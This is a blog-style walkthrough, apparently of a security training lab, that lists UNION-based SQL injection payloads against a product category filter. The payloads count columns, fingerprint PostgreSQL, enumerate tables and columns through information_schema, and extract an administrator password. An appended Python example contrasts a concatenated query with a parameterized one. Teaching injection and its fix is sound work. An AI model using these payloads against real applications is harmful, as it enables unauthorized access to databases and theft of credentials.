SQL injection attack, listing the database contents on non-Oracle databases

Aman Bhuiyan
Aug 11, 2023

Step 1: Go to the product category filter to check whether it is vulnerable to SQL injection. If it returns "Internal Server Error" or HTTP 500, the site is vulnerable to SQL injection.

Step 2: To check the number of columns, we run the injection query

' ORDER BY 1--

It responds with HTTP 200. That means the query returns at least 1 column.

' ORDER BY 2--

It also responds with HTTP 200. That means the query returns at least 2 columns.

' ORDER BY 3--

It responds with HTTP 500 and an internal server error. That means the query does not return 3 columns.

Note that every time we inject a query into the category filter, we have to URL-encode it by pressing Ctrl+U.

Step 3: To find out which database version it is,

' UNION SELECT @@version, NULL-- -

It responds with HTTP 500, so we know the database is not Microsoft. The version query for each database is:

Microsoft: SELECT @@version
PostgreSQL: SELECT version()
MySQL: SELECT @@version

Now run the PostgreSQL query:

' UNION SELECT version(), NULL-- -

It responds with HTTP 200 OK, so we know the database is PostgreSQL. The version string is shown in the column.

Step 4: To output the list of tables in the column:

' UNION SELECT table_name, NULL FROM information_schema.tables-- -

It outputs many table names. We need the users table, which is users_pvqzbm.

Step 5: Output the column names of the table

' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users_pvqzbm'-- -

It shows the columns:

  1. username_jtnnkn
  2. password_nlwkhx

Step 6: To retrieve the username and password

' UNION SELECT username_jtnnkn, password_nlwkhx FROM users_pvqzbm--

username: administrator

password: hzqr473zb2niyr9rs587
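
Why the steps above work, and the fix, as an added example that is not part of the original post: a category filter built by string concatenation next to the parameterized version of the same query. SQLite stands in for PostgreSQL here, and the table names, column names and data are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the PostgreSQL backend.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1), ('Draft item', 'Gifts', 0);
        INSERT INTO users VALUES ('administrator', 'constructed-secret');
    """)
    return db

def products_vulnerable(db, category):
    # Vulnerable: the filter value is concatenated into the SQL text, so a
    # quote in it ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT name, category FROM products "
           "WHERE category = '" + category + "' AND released = 1")
    return db.execute(sql).fetchall()

def products_safe(db, category):
    # Hardened: the value is bound as a parameter and is only ever compared
    # as data, whatever characters it contains.
    sql = ("SELECT name, category FROM products "
           "WHERE category = ? AND released = 1")
    return db.execute(sql, (category,)).fetchall()

# The step 6 input shape from the walkthrough, using the constructed names.
PAYLOAD = "' UNION SELECT username, password FROM users--"

if __name__ == "__main__":
    db = make_db()
    print("concatenated: ", products_vulnerable(db, PAYLOAD))
    print("parameterized:", products_safe(db, PAYLOAD))
    print("normal use:   ", products_safe(db, "Gifts"))
```

With the bound parameter the whole input is compared against the category column as one string, so it matches no rows and the users table is never read.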

#HappyHacking
